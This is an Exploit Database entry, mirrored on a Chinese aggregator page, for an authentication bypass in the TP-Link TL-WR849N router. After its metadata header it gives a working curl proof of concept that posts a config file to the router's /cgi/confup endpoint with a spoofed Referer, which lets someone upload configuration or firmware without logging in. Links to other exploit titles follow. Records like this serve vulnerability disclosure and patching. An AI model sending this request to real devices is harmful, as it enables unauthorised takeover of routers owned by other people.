TL-WR849N 0.9.1 4.16 – Authentication Bypass (Upload Firmware)

Exploit Database
17 阅读

作者： Elber Tavares

日期： 2020-03-02
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/48152/

# Exploit Title: TL-WR849N 0.9.1 4.16 - Authentication Bypass (Upload Firmware)
# Date: 2019-11-20
# Exploit Author: Elber Tavares
# Vendor Homepage: https://www.tp-link.com/
# Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/#Firmware
# Version: TL-WR849N 0.9.1 4.16
# Tested on: linux, windows
# CVE : CVE-CVE-2019-19143

Uploading new firmware without access to the panel

REFS:
 https://github.com/ElberTavares/routers-exploit/tp-link
 https://fireshellsecurity.team/hack-n-routers/


Poc:
curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer:
http://TARGET/mainFrame.htm" -F data=@conf.bin
http://TARGET/cgi/confup

last Exploits
TL-WR849N 0.9.1 4.16 – Authentication Bypass (Upload Firmware)的更多信息

Joomla! Component com_agency – SQL Injection：
Oracle PeopleSoft Enterprise PeopleTools < 8.55 - Remote Code Execution Via Blind XML External Entity：
Human Resource Management System 1.0 – SQL Injection (unauthenticated)：
Inout Webmail Ultimate Edition 4.0 Script – Improper Access Restrictions：
Joomla! Component Gantry 3.0.10 – Blind SQL Injection：
Orion Network Performance Monitor 10.1.3 – ‘CustomChart.aspx’ Cross-Site Scripting：
nopCommerce Store 4.30 – ‘name’ Stored Cross-Site Scripting：
WordPress Plugin Video Gallery 2.8 – SQL Injection：